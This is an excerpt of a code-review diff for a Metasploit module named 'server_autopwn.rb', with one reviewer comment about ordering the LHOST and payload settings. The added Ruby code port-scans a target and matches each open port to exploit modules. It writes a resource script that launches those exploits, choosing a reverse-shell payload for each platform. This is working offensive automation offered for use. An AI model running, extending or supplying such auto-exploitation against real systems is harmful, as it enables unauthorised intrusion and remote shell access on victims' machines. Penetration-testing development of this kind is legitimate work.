modules/auxiliary/server/server_autopwn.rb

```diff
@@ -0,0 +1,178 @@
+
+                # Actually perform the TCP connection
+                s = connect(false,
+                  {
+                    'RPORT' => port,
+                    'RHOST' => ip,
+                    'ConnectTimeout' => (timeout / 1000.0)
+                  }
+                )
+                if s
+                  print_good("#{ip}:#{port} - TCP")
+                  r << [ip,port,"open"]
+                  opentcp << port
+                end
+              rescue ::Rex::ConnectionRefused
+                vprint_status("#{ip}:#{port} - TCP closed")
+              rescue ::Rex::ConnectionError, ::IOError, ::Timeout::Error
+              rescue ::Rex::Post::Meterpreter::RequestError
+              rescue ::Interrupt
+                raise $!
+              rescue ::Exception => e
+                print_error("#{ip}:#{port} exception #{e.class} #{e} #{e.backtrace}")
+                ensure
+                if s
+                  disconnect(s) rescue nil
+                end
+              end
+            end
+          end
+          t.each {|x| x.join }
+        rescue ::Timeout::Error
+          ensure
+          t.each {|x| x.kill rescue nil }
+        end
+        r.each do |res|
+          report_service(:host => res[0], :port => res[1], :state => res[2])
+        end
+        # generic shell backup
+        $payl = "generic_shell_reverse"
+        # use port scanning to build script here
+        for openport in opentcp do
+          msfmodules = []
+          # find modules  and loop over them
+          msfmodules = Find.find(datastore['LPATH']).select { |p| /.*\.rb$/ =~ p }
+          for mod in msfmodules do
+            if  File.open(mod).grep(/\(#{openport}\)/) do
+                open('msfexec.rc', 'a') { |m|
+                mod = mod.gsub(/.*exploits\//, "exploits/")
+                m.puts("use #{mod}")
+                print_good("Adding exploit: #{mod}")
+                m.puts("set LPORT #{$handler}")
+                # try to guess the payload shell from the current exploit
+                if mod["linux"]
+                  payl = "linux/#{datastore['ARCH']}/shell_reverse_tcp"
+                end
+                if mod["windows"]
+                  payl = "windows/#{datastore['ARCH']}/shell/reverse_tcp"
+                end
+                if mod["freebsd"]
+                  payl = "bsd/#{datastore['ARCH']}/shell/reverse_tcp"
+                end
+                if mod["osx"]
+                  payl = "osx/#{datastore['ARCH']}/shell_reverse_tcp"
+                end
+                if mod["android"]
+                  payl = "android/shell/reverse_tcp"
+                end
+                if mod["aix"]
+                  payl = "aix/ppc/shell_reverse_tcp"
+                end
+                if mod["solaris"]
+                  payl = "solaris/#{datastore['ARCH']}/shell_reverse_tcp"
+                end
+                m.puts("set payload #{payl}")
```

Comment:
Might be worth setting the LHOST *after* the setting payload. You might not need the sleep below.